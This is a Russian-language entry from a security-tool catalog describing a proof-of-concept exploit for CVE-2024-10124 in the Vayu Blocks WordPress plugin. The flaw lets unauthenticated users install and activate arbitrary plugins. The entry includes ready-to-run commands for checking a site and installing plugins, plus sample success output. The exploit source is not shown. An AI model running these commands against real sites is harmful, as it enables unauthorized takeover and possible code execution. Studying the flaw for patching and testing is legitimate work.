Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10124-Poc — Эксплойт proof-of-concept для CVE-2024-10124 в плагине Vayu Blocks для WordPress, позволяющий несанкционированно устанавливать и активировать плагины, что потенциально может привести к удалённому выполнению кода. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-10124-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-10124-poc

CVE-2024-10124-Poc

Эксплойт proof-of-concept для CVE-2024-10124 в плагине Vayu Blocks для WordPress, позволяющий несанкционированно устанавливать и активировать плагины, что потенциально может привести к удалённому выполнению кода.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
11 год назадЕщё не проверено

CVE-2024-10124-Poc

Плагин Vayu Blocks – Gutenberg Blocks для WordPress & WooCommerce уязвим к произвольной установке и активации плагинов без авторизации из-за отсутствия проверки прав доступа в функции tp_install() во всех версиях до 1.1.1 включительно. Это позволяет неаутентифицированным атакующим устанавливать и активировать произвольные плагины, что может быть использовано для достижения удалённого выполнения кода, если установлен и активирован другой уязвимый плагин. Эта уязвимость была частично исправлена в версии 1.1.1.

Примеры сценариев

Проверка уязвимости

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version

Эта команда проверит версию плагина vayu-blocks, чтобы определить, уязвим ли сайт.

Установка плагина (по умолчанию)

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress

Эта команда установит плагин по умолчанию hello-dolly

Установка конкретного плагина

root@kitploit:~
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name

Эта команда установит плагин plugin_name на целевом сайте.

root@kitploit:~
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL (e.g., http://192.168.100.74/wordpress)
  -p PLUGIN, --plugin PLUGIN
                        Plugin name (default: hello-dolly)
  --check-version       Check if the site is vulnerable based on plugin version

Вывод

root@kitploit:~
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"

Примечание:

Этот скрипт предоставлен только в образовательных целях. Автор не несёт ответственности за любой ущерб, причинённый в результате неправильного использования этого скрипта.

Скачать инструмент
🔍КомандаОписаниеПример
🌐-u or --urlУказывает целевой URL для сайта WordPress.-u http://192.168.100.74/wordpress
🔒--check-versionПроверяет, уязвим ли сайт, на основе версии.-u http://192.168.100.74/wordpress --check-version
⚙️-p or --pluginУказывает имя плагина (по умолчанию hello-dolly).-u http://192.168.100.74/wordpress -p plugin_name